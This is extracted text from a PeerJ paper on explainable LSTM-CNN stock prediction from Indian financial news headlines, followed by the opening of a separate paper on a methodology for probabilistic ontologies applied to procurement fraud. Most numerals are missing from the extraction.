the algorithm. prediction input: processed news headlines instantiate reducelrplateau() instantiate modelcheckpoint() instantiate earlystopping() truncate and pad input sequence while epoch r: ->r for batch_size b: ->b design the model by adding: sequential layer to lstm model embedding layer conv d() and maxpooling d lstm() dense layer fit the model evaluate the model save the model use xai to interpret the model output: table with predicted opening values gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xai input: processed headlines instantiate limetextexplainer() instantiate explain_instance() with appropriate hyperparam- eters(text, pipeline.predict_proba, number of features) create an ordered dictionary of words and weights plot a bar-plot with appropriate axes output: plot of biases of words (weights) vs words procedure selecting the prediction model based on the evaluation done by ghosh et al. ( ) comparing the various models, including simple linear regression such as arima, ar, arma, or nonlinear models such as ann, arch, rnn, lstm it was concluded that lstm could achieve higher accuracy as compared to other models. stock market prediction requires a nonlinear dynamic system; lstm can train themselves with nonlinear input–output pairs. moreover, combining qualitative factors like international events, financial news, news headlines’ sentiments, etc. can achieve much higher accuracy. selecting datasets a dataset of financial news headlines is obtained from pulse. pulse is a news aggregator and it aggregates financial news from various sources thus providing less biased dataset. this dataset is combined with a yahoo finance dataset (yahoo finance, ). since our main focus was on indian stock market prices (hiransha et al., ), we extracted news headlines from the dataset accordingly. moreover, an indication of changes in the stocks (zhang, fuehres & gloor, ) for bse and nse was included. the values represented the stock market prices of the day the news headline was published and of the day after. the dataset was split into % for training, % for validation, and % for testing. the dataset used in this project has , data entries and has parameters: new headlines, website and the timestamp. data preprocessing the data obtained is raw and unprocessed. to perform any computation, processing the data is necessary. for instance, the null data should be removed, and the trivial values should be removed, etc. given below in the fig. is the raw dataset obtained from the sources. this is what the financial news dataset looked like before preprocessing. table shows the features neccessary for our model and we clean the dataset to obtain only these features. steps involved in data preprocessing are represented in fig. : as we are first training the lstm model only for bse-sensex and nse-nifty, we train it on news headlines involving sensex and nifty specific news only. for this, we search for headlines that contain the word: ‘‘sensex’’ (case - independent). gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure dataset before cleaning. the data collected through various sources consists of unwanted and redundant values that need to be processed. full-size doi: . /peerjcs. /fig- table features of clean data. final columns that are used in the dataset that is necessary for the model building and model evaluation. column a column b column c news headline website timestamp figure steps in data preprocessing. (a) dropping: to include only the necessary data, unwanted columns/rows must be dropped; (b) tokenization helps in increasing the speed of computation and efficiency; (c) cleaning is required after tokenization since some words are not necessary for the evaluation; (d) normalizing: by bringing all values in one range, it is easier to compare various values and evaluate the model. full-size doi: . /peerjcs. /fig- after running the code on our cleaned dataset we get this result as shown in fig. . sentiment analysis for stock market news headlines to be able to predict the stock market (patel et al., ), we must understand the market’s sentiment correctly. negative news will lead to a fall in the price of the stock and positive news will lead to rising in the price of the stock. the most commonly used words in a news headline will give rise to an instant trigger of emotions in a particular person’s mind. hence we made a word cloud of the top words commonly occurring in a news headline from our dataset as depicted below in fig. . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dataset after cleaning. clean dataset, after preprocessing helps in an efficient model building and model evaluation. full-size doi: . /peerjcs. /fig- figure top commonly used words in a news headline by using wordcloud. the wordcloud generated from the data gives the overview of which words in the headline impact stocks. full-size doi: . /peerjcs. /fig- lstm network is a type of rnn that preserves its state. (olah, ) lstm (selvin et al., ) has already provided satisfactory results in the area of text data applications such as machine translation and nlp (bird, klein & loper, ). the headlines are a type of text data; for that reason, it was a rational decision to apply this type of network to our data. figure shows the lstm network architecture used in our project. input news features from different online news sites have been scraped and used as input for our application. then the headlines are cleaned, and the remaining characters are converted to lowercase to overcome identical double words with different capitalization. word embedding is dealt with by changing over the words to their proper index using the top words in the corpus; the rest of the words that are not found in the top words corpus are set to zero. the maximum size of the word embeddings is and zero-padded for smaller headlines. gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network architecture of lstm network. the network architecture of the lstm network de- picts how the processed headlines are embedded and passed through a cnn layer and further through an lstm cell to output the prediction. full-size doi: . /peerjcs. /fig- lstm - cnn model for news headlines . initially, we have created an instance of reducelronplateau, which reduces the learning rate when a metric has stopped improving accuracy. . secondly, we have a modelcheckpoint callback. it is used for training the model using model.fit() to save a model or weights at some interval, which can be loaded later to continue the training from the state saved. . an instance of earlystopping is created. this stops training the model when a particular metric has stopped improving. then the preprocessed data is loaded and only the top n words are kept, and the rest are zero. also, split it into the train dataset and test dataset. the data is then truncated and we pad the input sequence (x_train and x_test). a split of - is done for the train and test. . finally, we create a model. (a) the first layer is constructed using the sequential network model of the keras framework. a sequential model works good enough for vanilla stack layers. each layer has one input tensor and one output tensor exactly. (b) the next layer, i.e., an embedding layer, is added. here, the text data is encoded first. in an embedding, words are defined by dense vectors. each vector serves the projection of the word into a continuous vector space. (c) then a maxpooling d layer is added. a pooling layer is an elementary constituent unit of cnn. the main function of the pooling layer is to sequentially minimize the spatial orientation size and the number of parameters and hence reduce the computation required over the network. the pooling layer operates separately for each feature map. out of all the pooling layers, the one best suited for our model was max pooling. it is depicted as follows: it takes the maximum value over the window defined by pool_size and hence downsamples the input representation. in our model, the pool_size is . figure visualises the working of cnn maxpooling d. next, we then construct an lstm layer of units, as our inputs’ maximum review length is . we then add a dense layer having the activation function of sigmoid as this is our final layer. we also are using an adam optimizer with a learning rate of e− . the gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure cnn maxpooling d. the maxpooliing d layer minimizes the spatial orientation size. the layer works separately on each feature. full-size doi: . /peerjcs. /fig- model is finally compiled and then we save the model. we then print the model summary and the function is called for today and tomorrow parameters. lstm model for ohlc dataset the ohlc dataset consists of open, high, low and close stock prices of a particular company for each period. for this model, we have initially loaded the dataset and split it into test and train data. this dataset does not require much preprocessing as the data and operation over it is very straightforward. once data is loaded we use minmaxscaler() which transforms features by scaling each feature to a given range. the fit_transform method is applied to the instance scl of minmaxscaler() to tokenize the text and output, each dimension corresponding to the frequency of token found in the text. the data is split into input ‘x’ and output ‘y’. it is collected by splitting ‘i’ past days as input x and ‘j" coming days as y. the fit_transform method is applied to the instance scl of minmaxscaler() to tokenize the text and output. then we build the model with the first layer constructed using the sequential model and the next hidden layers using lstm finally, a dense() layer is used for constructing the output. hyperparameters, loss function and optimizer a hyperparameter is a configuration whose value cannot be determined by the dataset. it needs trial experiments where one can manually test which hyperparameter suits best for the model.once fine-tuned the model is trained better. optimizers are algorithms for altering the attributes as weights and learning rate in order to reduce the loss. table represents the hyperparameters and their values used in the experiment. lime as represented in fig. , after training the model and obtaining predictions the explainer interpretes the model so that the user can make appropriate judgements. after studying various xai (khaleghi, ; ribeiro, singh & guestrin, ) tools like lime, what- if (wexler et al., ), deeplift (shrikumar et al., ), shapely (messalas, christos & gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table hyperparameters, loss function and optimizer and their values used along with detailed com- ments. title value comments loss function binary cross-entropy since the type of classification performed is binary optimizer adam optimization used to enhance the network learning rate . set after trials decay . validation loss does not ameliorate significantly any more for epochs, there will be decay. figure working of xai. the mode generates the prediction, which along with the data, is run through the xai tool. the xai tool explains the data based on the biases to facilitate better decision making. full-size doi: . /peerjcs. /fig- yannis, ), we realized the one which will determine the transparency of our model in the best possible way was lime. according to the study, the what-if tool is an interactive visual tool to help the user comprehend the datasets and better understand the output of tensorflow models. to analyze the models deployed. however, it is well suited for xgboost and scikit learn models. deeplift is a tool that collates the activation of a neuron to its ’reference points’ and assigns contribution scores accordingly. a single backward pass is used to compute scores efficiently. deeplift reveals dependencies that are otherwise missed by other methods giving separate consideration for positive and negative contributions. lime, short for local interpretable model-agnostic explanations (ribeiro, singh & guestrin, ), is a tool that is used to explain what the machine learning model is performing. it is applied to the models which perform behaviour but we do not know how it works. machine learning models (patel et al., ) can be explained using plots, for example, linear regression, decision trees; these are some of the classifiers that can be explained using plots (it can only give an explanation for the global, but it cannot give an explanation of any local observation). but there are some significant data with more complexities and more dimensions that cannot be explained using plots. one of the examples is the neural network; it cannot be explained using plots. gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. by using lime, we can understand what the model does, which features it picks on to create or develop prediction. lime is model-agnostic; it means that it can be used for any black-box model that we know today or can be developed in the future. lime tool is local; it means it is observation specific; it explains every single observation that you have in a dataset. if a model has a high accuracy, can we trust the model without having interpretability? the answer is no; we cannot trust it because many models have noises that can predict the output right, but the way the model has predicted will contain some faults which are not good for a long term process. so, interpretability is important for building trust with the model. performance measure validation loss for neural networks we consider the loss to be negative log-likelihood for classification and residual sum of squares for regression. hence the primary aim of our learning model is to decrease the value of the loss function as we tune its parameters by changing weights through different optimization methods. the value of loss suggests how well a certain model runs for each optimization iteration. preferably, after each iteration, we would expect a decrease in the value of the loss. some points should be kept in mind while we observe the decrease in loss value. for example, one may face the problem of overfitting wherein the model memorizes the training dataset examples and becomes less effective for the test dataset. over-fitting also occurs when you do not employ a regularization or normalization. we may have a very intricate model, or the number of data points n is very low. validation accuracy we calculate the accuracy of a model once the model is completely trained. this means that the parameters are fixed, and no further model learning will be taking place. then the test dataset is then inputted into the model, and the number of errors the model makes is reestablished after comparing it with the target values. finally, the percentage of misclassified data is calculated. let us understand this with an example. the model’s accuracy is . % means that out of , test samples, the model classifies of samples correctly. results and discussion result table represents the results generated after performing the experiments. in lstm-cnn the input was the data that we get from preprocessing. the data was then combined with a dataset of the news headlines and the prices. the model which we trained was of the news headlines of sensex. there are a total of epochs to be run in the training of the model. but it stops at the th epoch; this is due to avoiding making the model overfitting. the accuracy of the model in a total of epochs is . %. the loss was . . as we see in fig. : gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table result generated. the lstm-cnn model results using the new headlines dataset and its com- parison with the result generated by the lstm model using the ohlc dataset. the result depicts the ac- curacy and loss of the two models. model dataset no of epochs accuracy loss lstm-cnn news headlines . % . lstm ohlc . % . figure loss lstm -cnn model for news headlines. the loss values for the lstm-cnn model showing that the model was processed till epoch no. , and there was an early stopping to avoid overfitting. full-size doi: . /peerjcs. /fig- epoch :val_acc did not improve from . . there are a total of epochs. they stopped training at to th epochs. this is because of the function earlystopping that helps to avoid the problem of overfitting. the accuracy remains constant after the th epochs, whereas, val_acc starts decreasing due to which training stops. val_acc:- it is the measure of how good are the predictions of the model. so, in our case, the model is very well trained till the th epoch, and after that, the training is not necessary. acc:- it gives the percentage of instances that are correctly classified. in our case, the percentage is . %. val_loss:- val_loss is the loss that is applied to the testing set, whereas, the loss is applied to the training set. val_loss is the best to depend on to avoid the problem of overfitting. overfitting is when the model is fit too closely to the training data. the val_loss and loss keep on decreasing, whereas acc and val_acc are kept on increasing this shows that our model is well-trained. figure visualises the loss over number of epochs. as according to the plot obtained after training, we observe that initially, the loss is very high; however the validation loss is low relatively. once the epochs progress, the loss decreases, thus providing better learning for our model. the point where the loss and validation loss plateaus are the point where no further learning might be possible with the same amount of data for the same number of epochs. although the accuracy of lstm-cnn with news headlines data is less than lstm with ohlc data, since we are interpreting the model, it is adding another perspective of viewing at the model, which makes it a better model. when compared with rnn-cnn (tan et al., ; zhang, chen & huang, gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure loss for lstm for ohlc data. graph comparing the loss vs. val_loss for the ohlc dataset for the lstm model shows as the number of epochs progresses, the values of loss and val_loss tend to de- crease and plateau to approximately . . full-size doi: . /peerjcs. /fig- figure sample , feature weights given by lime. result obtained by lime tool after modeling it. we get a cumulative , explanation features. each word is weighted. full-size doi: . /peerjcs. /fig- ) model , which it performs way better since not only does it remember small term information but also long term information. results of xai as for the first model,as shown in fig. , we get a cumulative , explanation features. the word surge is mostly related in a negative context and hence is having a negative weight. similarly, higher is mostly in those sentences which depict the growth of stocks and hence is having positive weight. we can also observe the word sensex having near about neutral weight as it has both positive and negative references. thus depicts both falls as gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table results of lime tool. the sample of the result obtained by the lime tool where each word is as- signed weight or bias. test words weights or biases (approx) surge − . baroda + . higher + . edges + . live + . bank + . sensex − . of − . sbi − . figure prediction results. bar graph depicting predicted open vs. actual open. the red bar shows the actual open prices, and the blue bar shows the predicted opening prices for days. full-size doi: . /peerjcs. /fig- well as the rise of stocks. by table , we can thus interpret our data and thus understand the biases in the dataset. our model is not just a black box now, and the customers know the insides of the system through just one graph. thus we achieve the explanations along with the insights from the data. test results as shown in above fig. , the trained model can now be tested for predictions. the blue bar represents the predicted value, and the red bar represents the actual value obtained from the dataset. this gives us a fair understanding of the output. if we want to test for the real-time news, we can enter news that gets preprocessed and get a measure of the opening price, i.e., how much did the opening price rise or fall from the previous opening price. we present values in table for getting the exact idea of these values and gauge the accuracy of our predictions. the table below shows the following: date of actual open , previous closing price, predicted opening price by our model, actual opening price, rise / fall in price, error percentage, chi-squared test. here the: rise/fall is given by: (predicted open -previous close) ( . ) gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table set of predictions made. the table with the final set of predictions along with comparisons with actual opening prices, calculations for rise/fall, error percentage, and the chi-squared test. test case date previous close predicted open actual open rise/fall error(%) chi-squared test / / . . . . . . / / . . . − . . . / / . . . . . . / / . . . − . . . / / . . , . . . . / / . . , . − . . . / / . . , . . . . error percentage is given by: abs((actual-predicted)/(actual ))* ( . ) chi-square is given by:(actual - predicted) /predicted ( . ) as presented above in table , seven test cases have been stated with the stock market prices along with the rise and fall of those values. the error represents the value difference in percentage (actual-predicted by our model) and for our test cases, it’s showing in the range . to . . thus, we could manage to predict the indian stock market price using xai by referring to the impact of financial news articles. also the chi-square test allows us to assess how much is the observed data varying from actual data. conclusion and future scope the financial news articles play a major role in the movement of the stock price. financial news plays a dominant factor in how a particular company’s stock is perceived by the investors at a given time. making predictions based on news headlines can help budding investors learn how and when stock prices fall or rise and take a decision based on the same. our proposed model created an explainable model that gives this explanation as well as maintains and thus makes the output meaningful. this was done with the xai using the tool lime. future research directions could be automated predictions from a news headline from a financial website and a multilingual financial news headline prediction. we can also add emotion-based gifs to add a fun element and make it more appealing for the learner. the prediction model can be used as a decision-maker for an algorithmic trading model. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • shilpa gite and ketan kotecha analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • hrituja khatavkar conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • shilpi srivastava conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • priyam maheshwari performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • neerav pandey performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data, including financial news headlines obtained from pulse and data from yahoo finance, is available in the supplementary files. code is available at github: https://github.com/hrituja/stock-market-prediction. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bird s, klein e, loper e. . natural language processing with python. available at https://b-ok.cc/book/ /be d ?dsource=recommend (accessed on july ). cho k, merrienboer bv, gulcehre c, bahdanau d, bougares f, schwenk h, bengio y. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in: proceedings of the conference on empirical methods in natural language processing (emnlp). doi . /v /d - . doran d, schulz s, besold tr. . what does explainable ai really mean? a new conceptualization of perspectives. arxiv preprint. arxiv:abs/ . . egeli b, ozturan m, badur b. . stock market prediction using artificial neural networks. in: proceedings of the rd international conference on business, hawaii, – june . – . ghosh a, bose b, maji g, debnath nn, sen s. . stock price prediction using lstm on indian share market. easychair : – doi . /qgcz. greff k, srivastava rk, koutnik j, steunebrink br, schmidhuber j. . lstm: a search space odyssey. arxiv preprint. arxiv: . . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://github.com/hrituja/stock-market-prediction http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://b-ok.cc/book/ /be d ?dsource=recommend http://dx.doi.org/ . /v /d - http://arxiv.org/abs/abs/ . http://dx.doi.org/ . /qgcz http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. hiransha m, gopalakrishnan ea, vijaykrishna m, soman kp. . nse stock market prediction using deep-learning models. procedia computer science : – doi . /j.procs. . . . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – doi . /neco. . . . . kalyani j, bharathi hn, rao j. . stock trend prediction using news sentiment analysis’’. international journal of computer science & information technology (ijcsit) ( ): – . khaleghi b. . the how of explainable ai: post-modelling explainability. towards media science. available at https://towardsdatascience.com/the-how-of-explainable- ai-post-modelling-explainability- b cbc adf f (accessed on july ). kim h, won c. . forecasting the volatility of stock price index: a hybrid model inte- grating lstm with multiple garch-type models. expert systems with applications : – doi . /j.eswa. . . . messalas a, christos m, yannis k. . model-agnostic interpretability with shapley values. doi . /iisa. . . moghar a, hamiche m. . stock market prediction using lstm recurrent neural net- work. procedia computer science : – doi . /j.procs. . . . nayak a, pai mm, pai rm. . prediction models for indian stock market. procedia computer science : – . olah c. . understanding lstm networks. [blog post]. available at https://colah. github.io/posts/ - -understanding-lstms/ (accessed on july ). patel j, shah s, thakkar p, kotecha k. . predicting stock and stock price index movement using trend deterministic data preparation and machine learning tech- niques. expert systems with applications : – doi . /j.eswa. . . . patel j, shah s, thakkar p, kotecha k. . predicting stock market index using fusion of machine learning techniques. expert systems with applications : – doi . /j.eswa. . . . pathmind, inc. . a beginner’s guide to lstms and recurrent neural networks. available at https://pathmind.com/wiki/lstm. pulse by zerodha. . pulse by zerodha—the latest financial and market news from all major indian news sources aggregated in one place. available at https://pulse. zerodha.com/ (accessed on july ). ribeiro m, singh s, guestrin c. . ’’why should i trust you?’’: explaining the predictions of any classifier. : – doi . /v /n - . saffar m. . how explainable artificial intelligence (xai) can help us trust ai. medium. available at https://medium.com/altaml/how-explainable-artificial- intelligence-xai-can-help-us-trust-ai- f b d (accessed on july ). selvin s, vinayakumar r, gopalakrishnan ea, menon vk, soman kp. . stock price prediction using lstm, rnn and cnn-sliding window model. in: international conference on advances in computing, communications and informatics (icacci). doi . /icacci. . . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /neco. . . . https://towardsdatascience.com/the-how-of-explainable-ai-post-modelling-explainability- b cbc adf f https://towardsdatascience.com/the-how-of-explainable-ai-post-modelling-explainability- b cbc adf f http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /iisa. . http://dx.doi.org/ . /j.procs. . . https://colah.github.io/posts/ - -understanding-lstms/ https://colah.github.io/posts/ - -understanding-lstms/ http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . https://pathmind.com/wiki/lstm https://pulse.zerodha.com/ https://pulse.zerodha.com/ http://dx.doi.org/ . /v /n - https://medium.com/altaml/how-explainable-artificial-intelligence-xai-can-help-us-trust-ai- f b d https://medium.com/altaml/how-explainable-artificial-intelligence-xai-can-help-us-trust-ai- f b d http://dx.doi.org/ . /icacci. . http://dx.doi.org/ . /peerj-cs. sherstinsky a. . fundamentals of recurrent neural network (rnn) and long short- term memory (lstm) network. physica d: nonlinear phenomena : doi . /j.physd. . . shrikumar a, greenside p, shcherbina a, kundaje a. . not just a black box: learning important features through propagating activation differences.. tan kk, le nqk, yeh hy, chua mch. . ensemble of deep recurrent neural networks for identifying enhancers via dinucleotide physicochemical properties. cell ( ): doi . /cells . Ţiţan ag. . the efficient market hypothesis: review of specialized litera- ture and empirical research. procedia economics and finance : – doi . /s - ( ) - . vargas mr, lima bs, evsuko a. . deep learning for stock market prediction from financial news articles. in: ieee international conference on computational intelligence and virtual environments for measurement systems and applications (civemsa). piscataway: ieee, – . wexler j, pushkarna m, bolukbasi t, wattenberg m, viega f, wilson j. . the what-if tool: interactive probing of machine learning models. ieee transactions on visualization and computer graphics : – doi . /tvcg. . . yahoo finance. . yahoo finance–stock market live, quotes, business & finance news. available at https://in.finance.yahoo.com/ (accessed on july ). yoo pd, kim mh, jan t. . machine learning techniques and use of event infor- mation for stock market prediction: a survey and evaluation. in: international conference on computational intelligence for modeling, control and automation (cimca ). piscataway: ieee, – . zhang x, chen f, huang r. . a combination of rnn and cnn for attention-based relation classification. procedia computer science : – doi . /j.procs. . . . zhang x, fuehres h, gloor pa. . predicting stock market indicators through twitter ’’i hope it is not as bad as i fear. procedia - social and behavioral sciences : – doi . /j.sbspro. . . . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.physd. . http://dx.doi.org/ . /cells http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /tvcg. . https://in.finance.yahoo.com/ http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /j.sbspro. . . http://dx.doi.org/ . /peerj-cs. submitted october accepted july published august corresponding author kathryn b. laskey, klaskey@gmu.edu academic editor sandra gesing additional information and declarations can be found on page doi . /peerj-cs. copyright carvalho et al. distributed under creative commons cc-by . open access uncertainty modeling process for semantic technology rommel n. carvalho , , kathryn b. laskey and paulo c.g. da costa department of research and strategic information, office of the comptroller general of brazil, brasília, df, brazil department of computer science, universidade de brasília, brasília, df, brazil department of systems engineering and operations research, george mason university, fairfax, va, united states of america abstract the ubiquity of uncertainty across application domains generates a need for principled support for uncertainty management in semantically aware systems. a probabilistic ontology provides constructs for representing uncertainty in domain ontologies. while the literature has been growing on formalisms for representing uncertainty in ontologies, there remains little guidance in the knowledge engineering literature for how to design probabilistic ontologies. to address the gap, this paper presents the un- certainty modeling process for semantic technology (ump-st), a new methodology for modeling probabilistic ontologies. to explain how the methodology works and to verify that it can be applied to different scenarios, this paper describes step-by-step the construction of a proof-of-concept probabilistic ontology. the resulting domain model can be used to support identification of fraud in public procurements in brazil. while the case study illustrates the development of a probabilistic ontology in the pr-owl probabilistic ontology language, the methodology is applicable to any ontology formalism that properly integrates uncertainty with domain semantics. subjects artificial intelligence, world wide web and web science, software engineering keywords pr-owl, mebn, up, methodology, ump-st, semantic web, bayesian networks, uncertainty, modeling, semantic technology introduction the ability to represent and reason with uncertainty is important across a wide range of domains. for this reason, there is a need for a well-founded integration of uncertainty representation into ontology languages. in recognition of this need, the past decade has seen a significant increase in formalisms that integrate uncertainty representation into ontology languages. this has given birth to several new languages such as: pr-owl (costa, ; costa, laskey & laskey, ; costa, laskey & laskey, ; carvalho, ; carvalho, laskey & costa, ), ontobayes (yang & calmet, ), bayesowl (ding, peng & pan, ), p-classic (koller, levy & pfeffer, ) and probabilistic extensions of shif(d) and shoin(d) (lukasiewicz, ). however, the increased expressive power of these languages creates new challenges for the ontology designer. in addition to developing a formal representation of entities and relationships in a domain, the ontology engineer must develop a formal characterization of the uncertainty associated with attributes of entities and relationships among them. how to cite this article carvalho et al. ( ), uncertainty modeling process for semantic technology. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:klaskey@gmu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. while a robust literature exists in both ontology engineering (allemang & hendler, ; gomez-perez, corcho & fernandez-lopez, ) and knoweldge engineering for probability models (laskey & mahoney, ; druzdzel & van der gaag, ; korb & nicholson, ; o’hagan et al., ), these fields have developed largely independently. the literature contains very little guidance on how to build ontologies that capture knowledge about domain uncertainties. to fill the gap, this paper describes the uncertainty modeling process for semantic technology (ump-st), a methodology for defining a probabilistic ontology and using it for plausible reasoning in applications that use semantic technology. the methodology is illustrated through a use case in which semantic technology is applied to the problem of identifying fraud in public procurement in brazil. the purpose of the use case is to show how to apply the methodology on a simplified but realistic problem, and to provide practical guidance to probabilistic ontology designers on how to apply the ump-st. this paper goes beyond previous work on ump-st (e.g., haberlin, ; carvalho et al., ; alencar, ) to provide a comprehensive explanation of the methodology in the context of application to a real world problem, along with pragmatic suggestions for how to apply the methodology in practice. for purpose of exposition, our focus is primarily on the procurement fraud use case, but the ump-st is applicable to any domain in which semantic technology can be applied. our purpose is not to provide rigorous scientific evidence for the value of ump-st in comparison with any other methodology or no methodology. de hoog ( ) says, ‘‘it is extremely difficult to judge the value of a methodology in an objective way. experimentation is of course the proper way to do it, but it is hardly feasible because there are too many conditions that cannot be controlled.’’ the value of a methodology like ump-st lies in its ability to support a complex system development effort that extends over a long period of time and requires significant resources to implement. besides the large number of uncontrolled variables, the resources to implement a single case of sufficient complexity is difficult; experimentation requiring multiple parallel implementations is prohibitive. nevertheless, the experience of our development team is that the structure provided by ump-st was essential to the ability to capture the expert’s knowledge in a model whose results were a reasonable match to the expert’s judgments. the paper is organized as follows. the next section reviews existing design methodologies that provided inspiration for ump-st. the following section introduces the ump-st. next, we introduce our use case devoted to identifying fraud in public procurement in brazil. the fifth section explains the four disciplines of the ump-st in the context of the fraud use case, and is followed by a section discussing applicability of the ump-st to other domains. the paper concludes with a section on future work and a final section presenting our concluding remarks. related work successful development of any complex system requires following a structured, systematic process for design, implementation and evaluation. existing software and systems carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. engineering processes are useful as starting points, but must be tailored for engineering a probabilistic ontology. the ump-st draws upon a number of related processes for software engineering, ontology engineering, and bayesian network engineering to provide a process tailored to probabilistic ontology engineering. to provide a context for introducing the ump-st, this section reviews related literature on design processes that provided an initial basis for tailoring the ump-st. the unified process the unified process (up) is a widely applied software engineering process (jacobson, booch & rumbaugh, ; kruchten, ; balduino, ). it has three main characteristics: ( ) it is iterative and incremental; ( ) it is architecture centric; and ( ) it is risk focused. each project is divided into small chunks, called iterations, each concluding in delivery of executable code. these frequent deliverables yield an incremental implementation of the system. a key deliverable is the executable architecture, which is a partial implementation of the system that validates the architecture and builds the foundation of the system. finally, the up mitigates risk by prioritizing the highest risk features for early implementation. the reasoning is simple: if a critical aspect of the system is going to fail, it is better to discover this early enough to rework the design or cancel the project, than to realize after the fact that large amounts of resources have been wasted on a non-viable project. the up defines the project lifecycle as composed of four phases: ( ) inception; ( ) elaboration; ( ) construction; and ( ) transition. inception is usually the shortest phase. the main goal is to define the justification for the project, its scope, the risks involved, and the key requirements. in the elaboration phase, the primary concerns are to define most of the requirements, to address the known risks, and to define and validate the system architecture. the construction phase is the longest phase, where most of the development process resides. this phase is usually broken down into small iterations with executable code being delivered at the end of each iteration. finally, in the transition phase the system is deployed, the users are trained, and initial feedback is collected to improve the system. to support the project lifecycle, the up defines several disciplines or workflows. each discipline describes a sequence of activities in which actors or workers produce products or artifacts to achieve a result of observable value. for example, a developer might carry out a programming activity using the system specification in order to produce both source and executable code. there are several variations of the unified process (e.g., rational unified process, agile unified process, enterprise unified process). while each has its own set of disciplines, the following disciplines are common to most: business modeling, responsible for documenting the business processes in a language common to both business and software communities; requirements, responsible for defining what the system should do based on the information gathered from the customer; analysis & design, responsible for showing how the system will be realized in the implementation phase; implementation, responsible for developing the code necessary to implement the elicited requirements; test, which verifies and validates the code developed; and deployment, responsible for delivering the software to the end user. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ontology engineering according to gomez-perez, corcho & fernandez-lopez ( ), the first workshop on ontological engineering was held in conjunction with the th european conference on artificial intelligence in . since then, several methodologies for building ontologies have been proposed. gomez-perez, corcho & fernandez-lopez ( ) compare several different method- ologies used for building ontologies in the context of the methontology ontology development process (fernández-lópez, gómez-pérez & juristo, ). methontology identifies activities that are performed to build ontologies. the three main activity categories are: ( ) ontology management activities; ( ) ontology development oriented activities; and ( ) ontology support activities. the ontology management activities include: ( ) scheduling, which identifies activities, their dependency, the resources needed in each, and how long they will take; ( ) control, which guarantees that the project is going according to schedule; and ( ) quality assurance, which verifies if the products generated from the scheduled activities are satisfactory. these activities are general enough that they can be imported from other frameworks that are not specific to ontology engineering, such as the project management body of knowledge (pmbok), which is a general guide to project management. pmbok includes activities such as scheduling, control, among others (project management institute, ). because these are generic activities, it is not surprising that only one, the on-to-knowledge (otkm) methodology (sure, staab & studer, ), out of seven methodologies analyzed and compared by gomez-perez, corcho & fernandez-lopez ( ) describes these activities in detail. the methontology methodology only proposes these activities, but does not describe them in detail. the ontology development oriented activities are divided into three different steps: ( ) pre-development; ( ) development; and ( ) post-development activities. pre-development involves: ( a) an environment study to understand where the ontology will be used, which applications will use it, etc.; and ( b) a feasibility study in order to assess if it is worthwhile, feasible, and cost-effective to build this ontology. although these are important activities, they are not addressed in most of the methodologies for building ontologies. according to gomez-perez, corcho & fernandez-lopez ( ) only the methontology methodology proposes the environment study and describes the feasibility study. 